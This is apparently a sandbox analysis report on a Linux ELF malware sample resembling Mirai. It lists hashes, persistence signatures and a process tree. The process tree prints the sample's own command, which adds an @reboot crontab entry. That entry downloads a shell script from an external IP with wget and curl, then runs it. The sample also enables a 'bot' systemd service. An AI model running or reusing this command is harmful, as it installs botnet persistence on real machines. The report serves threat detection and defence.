Analysis

  • max time kernel
    141s
  • max time network
    154s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20231215-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20231215-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    08/01/2024, 03:41

General

  • Target

    9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf

  • Size

    64KB

  • MD5

    ccdcabc06ed12d315440fabad4c0e7a9

  • SHA1

    08603a1dc5aded6cd1d271a4d8d57bccb5c64495

  • SHA256

    9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff

  • SHA512

    2ff4c9983ab2addab390bca1dd34fe88c36d51028723d58a3ba742e8cb86a39e175f6dabb04c9960f2db84f17c5fc067eb8afa8119bf3bd6e498f22da6eadda2

  • SSDEEP

    1536:a3NvZJP6+ckhKHOBXygfki1An01Y0ff7VuCRerRY:kNhJS+YOBNMi1W0yYjAwKY

Score
7/10

Malware Config

Signatures

  • Changes its process name 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies systemd 1 TTPs 1 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

  • Modifies Bash startup script 1 TTPs 1 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
    /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
    1⤵
    • Changes its process name
    • Modifies Watchdog functionality
    PID:1525
  • /bin/sh
    sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
    1⤵
      PID:1530
      • /usr/bin/crontab
        crontab -
        2⤵
        • Creates/modifies Cron job
        PID:1532
      • /bin/sh
        sh bins.sh
        2⤵
          PID:1531
      • /usr/bin/crontab
        crontab -l
        1⤵
          PID:1533
        • /bin/chmod
          chmod +x bins.sh
          1⤵
            PID:1534
          • /bin/sh
            sh bins.sh
            1⤵
              PID:1535
            • /bin/curl
              /bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh
              1⤵
                PID:1536
              • /bin/chmod
                chmod +x bins.sh
                1⤵
                  PID:1537
                • /bin/sh
                  sh -c "/bin/systemctl enable bot"
                  1⤵
                    PID:1538
                    • /bin/systemctl
                      /bin/systemctl enable bot
                      2⤵
                        PID:1539

                    Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • /lib/systemd/system/bot.service

                            Filesize

                            368B

                            MD5

                            d77308e381db6ea7245af6f3b7be118e

                            SHA1

                            0a0f20a03f4db351a404954c780eebd15b3775bb

                            SHA256

                            feb6c31fee6eedbf83b5d657838427588bc7426532238a2675b8dbb74c9bf55b

                            SHA512

                            68c2b02daaaaa8d34e8f0a9264894fd781527b3b855477ac9435145daf5063e46d9abd7684f7c52be4f27850890be5261837dd3ad3f7a5a54d9343e2e6cda0e4

                          • /var/spool/cron/crontabs/tmp.uIfVKk

                            Filesize

                            241B

                            MD5

                            2f16a50a03b078ad9d67f3835641e9fd

                            SHA1

                            8317001974fe8b4806e2377f4e62f9c74d588388

                            SHA256

                            2d76916fafe2a76c0ec1fe539d813bec0aa03cf12d6a5301490d21dff498698f

                            SHA512

                            20b097960cce1f804f9be20f7ec9f36c75bfaba2dfaf6bf083433229d38db19896e9b95110eb47e6cafb69c8bc8f916a668115c2187ff00acf8833d607a18c85